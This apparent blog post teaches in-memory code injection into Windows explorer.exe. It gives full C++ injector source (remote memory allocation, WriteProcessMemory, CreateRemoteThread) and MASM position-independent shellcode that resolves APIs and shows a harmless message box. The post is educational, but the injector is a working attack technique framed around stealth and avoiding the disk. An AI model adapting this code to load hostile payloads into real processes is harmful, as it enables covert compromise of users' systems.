DLL-less Code Injection (...and the most complicated Hello, World! program ever written)
There is a common technique for subverting running processes on modern Windows systems known as DLL injection. I won't go into the details of it, but the basic idea is to force the target process to load a DLL containing code written by the attacker. When the DLL is loaded, its entry point function is executed (DLL_PROCESS_ATTACH event) and the DLL has a chance to do whatever it wants within the address space of the target process. This could include setting up threads to monitor the process, installing hooks on some of the process's functions to redirect execution - the opportunities for sneakiness and trickery are endless. There is tons of information about DLL injection on the web, here's one link: http://en.wikipedia.org/wiki/DLL_injection
DLL injection is a well-known technique, and there probably isn't much interesting to say about it that hasn't already been said before. What I am going to demonstrate is something much more exciting - code injection without the use of a DLL. The advantages of this are enormous: if you can inject code into a running process without using a DLL, you can get away without ever having to touch the filesystem - the piece of injected code only needs to exist in memory. Of course, you still need to be able to run the code that does the injection (the injector code, I'll call it) somehow. In the simplest case you might choose to do this by running an executable, and that executable would need to reside on disk. But there are conceivably other ways to get your injector code running on the target system. Here's some information about a Windows TCP/IP stack vulnerability that will frighten and amaze you: http://support.microsoft.com/kb/941644
Remote code execution (presumably in ring 0), and all modern versions of Windows are affected including 2000, XP, and Vista. It was discovered in early 2008. That's right, 2008. Of course it is now a known vulnerability and it has been fixed, but it proves that things like this are out there. Windows definitely has more of them, some of which haven't been discovered yet and, scarier still, some of which people have discovered but kept to themselves.
Anyway, the basics steps to DLL-less code injection are:
1) Find the process ID of the target process.
2) Open the target process.
3) Use VirtualAllocEx to allocate a chunk of memory in the address space of the target process. The allocated memory must be marked readable, writable, and executable.
4) Use WriteProcessMemory to copy a block of code (and probably data as well) to the memory allocated in step 3.
5) Use CreateRemoteThread to start up a thread (in the address space of the target process) that will begin executing the block of code copied in step 4.
We're going to do this using an 'injector' executable, and the block of code to be injected will be built and linked into our injector program. The first thing the injector program needs is a header file declaring two pointers: one points to the beginning of the injectable code block, and the other points to the end. This is the header file codeblk.h:
#ifndef _CODEBLK_H
#define _CODEBLK_H
#ifdef __cplusplus
extern "C" {
#endif
extern void *codeblk_start, *codeblk_end;
#ifdef __cplusplus
}
#endif
#endif
Next is the file winject.cpp, which contains code for finding the target process and doing the injection. For this example I use Windows explorer.exe as the target. This is the program that makes the start menu appear - Windows can actually run without it but in most cases it is always running while you are logged in.
//
// winject.cpp:
// Inject the code from codeblk.asm into the Windows Explorer process.
//
#include "stdafx.h"
#include "codeblk.h"
// Convert a string (in place) to lowercase
static void strtolower(_TCHAR *s) {
for (; *s; ++s) {
if (*s >= 'A' && *s <= 'Z') {
*s += ('a'-'A');
}
}
}
// Find the PIDs of all processes whose executable name matches the given name.
// Return them in a buffer, and return the number of pids in 'npids'. The caller
// is responsible for deallocating the returned buffer with 'free()'. The returned
// buffer will be NULL if 'npids' is 0.
static DWORD *getPids(const _TCHAR *exename, DWORD *npids) {
#define PIDS_ALLOC_SIZE 10
DWORD *pids = NULL;
HANDLE hsnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
PROCESSENTRY32 proc;
DWORD pidsBufSize = 0;
*npids = 0;
if (hsnap != (HANDLE)-1) {
if (Process32First(hsnap, &proc)) {
do {
strtolower(proc.szExeFile);
if (strcmp(proc.szExeFile, exename) == 0) {
if (*npids == pidsBufSize) {
// Make more room for PIDs
pidsBufSize += PIDS_ALLOC_SIZE;
pids = (DWORD*)realloc(pids, pidsBufSize*sizeof(DWORD));
}
pids[(*npids)++] = proc.th32ProcessID;
}
} while (Process32Next(hsnap, &proc));
}
CloseHandle(hsnap);
}
return pids;
#undef PIDS_ALLOC_SIZE
}
// Get the fully-qualified path to the Windows executable 'Explorer.exe'. We can't assume that
// it is on the C: drive, and we probably shouldn't assume the system directory is '\Windows' either.
static _TCHAR *getExplorerFullyQualifiedPath(DWORD *pathlen) {
const _TCHAR *varname = "SystemRoot";
const _TCHAR exename[] = "\\explorer.exe";
_TCHAR *path = NULL;
DWORD len = GetEnvironmentVariable(varname, NULL, 0);
if (len) {
*pathlen = len + sizeof(exename) - 1;
path = (_TCHAR*)malloc(*pathlen);
GetEnvironmentVariable(varname, path, len);
strcat(path, exename);
} else {
// Can't think of a situation when 'SystemRoot' wouldn't be available, but...
exit(1);
}
strtolower(path);
return path;
}
// Return the PID for Windows explorer. Returns 0 if an error occurs. One potential reason
// for failure is that explorer is not running.
static DWORD getExplorerPid(void) {
const _TCHAR *pname = "explorer.exe";
DWORD targetlen;
_TCHAR *target = getExplorerFullyQualifiedPath(&targetlen);
_TCHAR *tempPath = (_TCHAR*)malloc(targetlen);
DWORD npids;
DWORD epid = 0; // PID for explorer
// Find all matching pids
DWORD *pids = getPids(pname, &npids);
if (pids) {
// Check fully-qualified path name for each
for (DWORD n = 0; n < npids; ++n) {
HANDLE hproc = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, pids[n]);
if (hproc) {
if ( GetModuleFileNameEx(hproc, NULL, tempPath, targetlen) ) {
strtolower(tempPath);
if (strcmp(tempPath, target) == 0) {
// Found a match
epid = pids[n];
CloseHandle(hproc);
break;
}
}
CloseHandle(hproc);
}
}
free(pids);
}
free(target);
free(tempPath);
return epid;
}
// Open and inject code into the process with the given PID. Returns a pointer to the
// injected code, or NULL if an error occurred. The returned pointer and process handle
// should be cleaned up using injectCleanup().
static void *inject(DWORD pid, HANDLE *hproc) {
void *code = NULL;
*hproc = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION |
PROCESS_VM_WRITE | PROCESS_VM_READ | PROCESS_QUERY_INFORMATION, FALSE, pid);
if (*hproc) {
unsigned int codelen;
__asm {
mov eax, codeblk_end
mov ecx, codeblk_start
sub eax, ecx
mov codelen, eax
}
// The allocated pages need to be writable so we can write the injected code to them
// and so the injected code can store variables, and they also need to be executable
// so the injected code can run.
code = VirtualAllocEx(*hproc, NULL, codelen, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (code) {
WriteProcessMemory(*hproc, code, codeblk_start, codelen, NULL);
}
}
return code;
}
static HANDLE runInjectedCode(void *codeblk, HANDLE hproc) {
if (!codeblk || !hproc) {
return NULL;
}
#define MODULES_ALLOC_SIZE 1024
// Enumerate all modules loaded by the process
HMODULE *modules = NULL;
DWORD nbuf = 0;
DWORD nmod = 0;
do {
nbuf += MODULES_ALLOC_SIZE;
modules = (HMODULE*)realloc(modules, nbuf);
if (!EnumProcessModules(hproc, modules, nbuf, &nmod)) {
if (modules) {
free(modules);
}
return NULL;
}
} while (nmod >= nbuf);
#undef MODULES_ALLOC_SIZE
// Find kernel32.dll in the remote process. Chances are very good that it is loaded at
// the same virtual address in our process and in the remote process, but this isn't
// something we should depend on. Once we've found kernel32.dll, we calculate the address
// of GetProcAddress() for the remote process.
_TCHAR modname[sizeof("kernel32.dll")];
FARPROC rmtGetProcAddr = NULL;
for (unsigned int n = 0; n < nmod / sizeof(HMODULE); ++n) {
if (GetModuleBaseName(hproc, modules[n], modname, sizeof(modname)) == sizeof(modname)-1) {
strtolower(modname);
if (strcmp(modname, "kernel32.dll") == 0) {
// Get the address of the 'GetProcAddress' function in the remote process:
// 1) Find address of 'GetProcAddress' within our address space
// 2) Find offset of 'GetProcAddress' within kernel32.dll by subtracting our
// process's kernel32.dll module handle. This works because the module
// handle is simply the base address of the module.
// 3) Add offset from step 2 to the kernel32.dll module handle for the remote
// process.
HMODULE ourKernel32 = GetModuleHandle("kernel32");
FARPROC ourGetProcAddr = GetProcAddress(ourKernel32, "GetProcAddress");
if (ourKernel32 && ourGetProcAddr) {
HMODULE rmtKernel32 = modules[n];
__asm {
mov eax, ourGetProcAddr
sub eax, ourKernel32
add eax, rmtKernel32
mov rmtGetProcAddr, eax
}
}
break;
}
}
}
free(modules);
if (!rmtGetProcAddr) {
return NULL;
}
return CreateRemoteThread(hproc, NULL, 0, (LPTHREAD_START_ROUTINE)codeblk, rmtGetProcAddr, 0, NULL);
}
int _tmain(int argc, _TCHAR* argv[]) {
DWORD pid = getExplorerPid();
HANDLE hproc;
void *codeblk = inject(pid, &hproc);
HANDLE hthr = runInjectedCode(codeblk, hproc);
CloseHandle(hthr);
CloseHandle(hproc);
return 0;
}
I'm not going to explain each line of the code, but here are a few things that are noteworthy:
1) The function 'getPids()' doesn't just find the first process with the module name "explorer.exe", it finds all of them. Later we sort through them to find the one from the system directory (it would be C:\Windows\explorer.exe on most systems). The reason for this is that not every module named "explorer.exe" is necessarily Windows explorer - you could easily rename one of your other applications "explorer.exe" and run it. I like being thorough.
2) String comparisons are case-insensitive, since Windows doesn't use case sensitivity for its file systems.
3) I use the base address of kernel32.dll within the injector program, the base address of kernel32.dll from the target process, and the distance from the beginning of kernel32.dll to the 'GetProcAddress' function to find the address of the 'GetProcAddress' within the target process. On Windows XP, I don't think any of this is necessary. IIRC, kernel32.dll is always loaded at base address 0x7c800000 for all processes. Since the base address of the DLL is the same for the injector program and the target process, the addresses of all kernel32.dll functions are the same for both processes and none of the arithmetic is necessary. However, I don't think Vista works this way - I've heard they intentionally use randomized base addresses for security reasons. I haven't tried running this program on Vista yet.
4) This code was written for MS Visual C++. My stdafx.h includes windows.h, tlhelp32.h, and psapi.h. These 3 files need to get included somehow, however you do it.
5) I use assembly in a few places to do pointer arithmetic. You can do it with casts instead but it looks just as dirty and Visual Studio will bitch and moan about pointer truncation.
6) The single 4-byte argument that gets passed to the remote thread upon its creation is 'rmtGetProcAddr'. This is the address of the 'GetProcAddress' function within the target process.
Okay, so now we have a program that can inject code into explorer.exe. The only thing left is to create the code that gets injected. And this is the really ugly, difficult part. The basic problem with the injected block is that as soon as we run it within the target process, it suddenly knows nothing about what is around it. It is all alone in the unfamiliar world of another process and it has nothing with it except the little four-byte argument that was passed to CreateRemoteThread when we called it. It's tempting for us to start off our injectable code block by doing something like this:
MessageBox(NULL, "This is a test", "Test", MB_OK);
...But it is not going to be nearly that easy. That will compile and link. But the compiled code will refer to the MessageBox function within the address space of the injector program. The MessageBox function may be in a different place in the target process, so the address won't work any more after the code is copied over. Also, the two strings "This is a test" and "Test" will be stored in a data section of the injector program, and the compiled code will refer to them by their addresses. Once the code is copied over, these addresses are meaningless and there is no way to get at the strings - they are in the data portion of a different process. There are other problems too, such as the stack checks and security cookies that Visual Studio inserts into your code to detect buffer overflows - these also use addresses that will become meaningless when you copy the code over. The stack checks can be disabled, but the problem of being able to access strings and other data from the injected code can't reasonably be solved with C. We will end up having no choice but to resort to assembly if we actually want to _do_ anything.
The simplest possible piece of injected code we can create just returns immediately. Here is code for MASM:
.686P
.model flat
; Some versions of MASM make procedures public by default. Pain in the ass.
OPTION PROC:PRIVATE
codeblk SEGMENT
; Entry point for remote thread. This must be the first thing in the code block
_threadMain PROC
xor eax, eax
ret 4
_threadMain ENDP
; This should be the last thing in the code block
PUBLIC _codeblk_end
PUBLIC _codeblk_start
_codeblk_end dd _codeblk_end
_codeblk_start dd _threadMain
codeblk ENDS
END
Not terribly interesting, but it's a start. Now, the only thing we have is the address of the 'GetProcAddress' function, so we can call that to find out where various other API functions are. But there are two problems:
1) The first argument to GetProcAddress is a module handle. We don't have any module handles.
2) The second argument to GetProcAddress is a string. We have to be able to pass the address of a string somehow.
The solution to problem 1) is a dirty, dirty hack. We know that the address of 'GetProcAddress' is an address within kernel32.dll. We know that Windows always loads DLLs with base addresses that end in 0x0000 (or at least I think it does). Finally, we know that the function GetProcAddress appears well within the first 0x10000 bytes of kernel32.dll. This means we can just chop off the low 16 bits of the address and we have a module handle. Yay!
The solution to problem 2) involves something that we can't do with C. When we put strings in our C code they are actually placed in a separate data section in the executable. We need the data to sit right next to the code so it all gets copied over together. When the data and code are sitting next to each other, there is some distance between them that doesn't change. That is exactly what we need. If the injected code can find the absolute address of some part of itself, and if it can find the distance from there to the beginning of the data, then it can find the absolute address of the data. A piece of code can find it's own address by doing something like this:
call GRAB_EIP ; Pushes return address. Return address is address of GRAB_EIP
GRAB_EIP:
pop eax ; Pop address of GRAB_EIP off the stack into eax
That is essentially like saying 'mov eax, eip', except that that isn't a valid instruction.
Once we can use strings and call GetProcAddress, we're pretty much in the clear. We can use GetProcAddress to find GetModuleHandle or LoadLibrary, which means we can then get the addresses of functions from DLLs other than kernel32. The example code below demonstrates everything explained so far. It contains a table of modules and functions, and _linkFunctions loads each of the modules and fills the table in with the addresses of the functions. I call the MessageBox function to show that it works.
.686P
.model flat
; Some versions of MASM make procedures public by default. Pain in the ass.
OPTION PROC:PRIVATE
MB_OK EQU 0
MB_ICONASTERISK EQU 040h
codeblk SEGMENT
; Entry point for remote thread. This must be the first thing in the code block
_threadMain PROC
push [esp+4]
call _linkFunctions
; Display a 'Hello, world!' message box to prove our function table works
pushd MB_OK OR MB_ICONASTERISK ; Type flags
lea edx, [esp][-12]
pushd edx ; Caption (empty string). Use the address of the null HWND.
call _getDataStartPointer
lea ecx, [eax][helloWorldStr-DATA_START]
push ecx ; Message string
pushd 0 ; HWND (null)
add eax, pMessageBoxA-DATA_START
call dword ptr [eax]
xor eax, eax
ret 4
_threadMain ENDP
; Fills in the function table. Single argument is the address of the GetProcAddress function
_linkFunctions PROC
push ebp
mov ebp, esp
push ebx ; Holds address of 'GetProcAddress'
push esi ; Holds address of 'LoadLibraryA'
push edi ; Holds address of data in data table
; We get a module handle (base address) for kernel32.dll by truncating the lower 16 bits
; from our 'GetProcAddress' pointer. This works because 'GetProcAddress' (currently) appears
; within the first 0x10000 bytes of kernel32, and because Windows maps DLLs to base addresses
; divisible by 0x10000 (or at least it always seems to - that may not even be guaranteed).
; This is a bit of a hack.
mov ebx, [ebp+8]
mov edx, ebx
xor dx, dx
call _getDataStartPointer
mov edi, eax
add eax, loadLibraryStr-DATA_START
push eax ; 'LoadLibrary' string
push edx ; Handle to kernel32
call ebx ; Get the address of LoadLibraryA()
mov esi, eax
add edi, runtimeLinkFunctionTable-DATA_START ; Get first module name
FOR_EACH_MODULE:
mov dx, di ; These four instructions use some trickery to
neg dl ; round edi up to the nearest dword boundary.
and edx, 03h
add edi, edx
add edi, 4 ; Skip past module instance handle
mov dl, [edi]
test dl, dl ; Check for empty module name
jz FOR_EACH_MODULE_END
push edi ; Module name
call esi ; LoadLibrary
mov [edi-4], eax ; Save instance handle in the table
push eax ; Save the instance handle on the stack too
FOR_EACH_FUNCTION:
xor al, al
repnz scasb ; Find the end of the current string
mov dx, di ; Align edi to dword boundary, just as we did above
neg dl
and edx, 03h
add edi, edx
add edi, 4 ; Skip past the address at the beginning of the next entry
mov dl, [edi]
test dl, dl ; Check for empty function name
jz FOR_EACH_FUNCTION_END
push edi ; Function name
push [esp+4] ; Instance handle
call ebx ; Call GetProcAddress()
mov [edi-4], eax ; Store the function address in the table
jmp FOR_EACH_FUNCTION
FOR_EACH_FUNCTION_END:
pop eax
inc edi ; Go to next module
jmp FOR_EACH_MODULE
FOR_EACH_MODULE_END:
pop edi
pop esi
pop ebx
pop ebp
ret 4
_linkFunctions ENDP
; Find an absolute address of the start of the data based on the absolute address in
; EIP and the difference between this function's location and DATA_START.
; Returns result in eax and doesn't trash any other registers.
_getDataStartPointer PROC
call GRAB_EIP
GRAB_EIP:
pop eax
add eax, DATA_START-GRAB_EIP
ret
_getDataStartPointer ENDP
; The data, which we keep separate although it is all part of the same code segment
DATA_START:
loadLibraryStr db 'LoadLibraryA',0
helloWorldStr db 'Hello, world!',0
; Functions we link to at runtime. The format is:
; [instance handle for module 1][name of module 1],0
; [address of function 1 from module 1][name of function 1 from module 1],0
; [address of function 2 from module 1][name of function 2 from module 1],0
; ...
; [address of function N from module 1][name of function N from module 1],0
; [dummy address (four zero bytes)], 0
; [instance handle for module 2][name of module 2],0
; [address of function 1 from module 2][name of function 1 from module 2],0
; ...etc.
;
Func MACRO name
ALIGN 4
p&name dd ?
db '&name',0
ENDM
ModuleFuncTable MACRO name
ALIGN 4
pmod&name dd ?
db '&name',0
ENDM
TableEnd MACRO
ALIGN 4
db 5 dup (?)
ENDM
ALIGN 4
runtimeLinkFunctionTable:
ModuleFuncTable Kernel32
Func GetProcAddress
Func GetModuleHandleA
TableEnd
ModuleFuncTable Gdi32
Func CreateCompatibleDC
Func CreateCompatibleBitmap
Func DeleteDC
Func DeleteObject
Func SelectObject
TableEnd
ModuleFuncTable Msimg32
Func GradientFill
TableEnd
ModuleFuncTable User32
Func CreateWindowExA
Func DestroyWindow
Func GetDC
Func GetSystemMetrics
Func MessageBoxA
Func PeekMessageA
Func DispatchMessageA
Func ReleaseDC
Func SendMessageA
Func SetWindowPos
Func ShowWindow
TableEnd
TableEnd
; This should be the last thing in the code block
PUBLIC _codeblk_end
PUBLIC _codeblk_start
_codeblk_end dd _codeblk_end
_codeblk_start dd _threadMain
codeblk ENDS
END
When built properly, this code should run fine on any XP system. It works fine even when explorer.exe is protected by DEP. I haven't tested it on Vista yet.
Have fun!
0 Comments:
Post a Comment
<< Home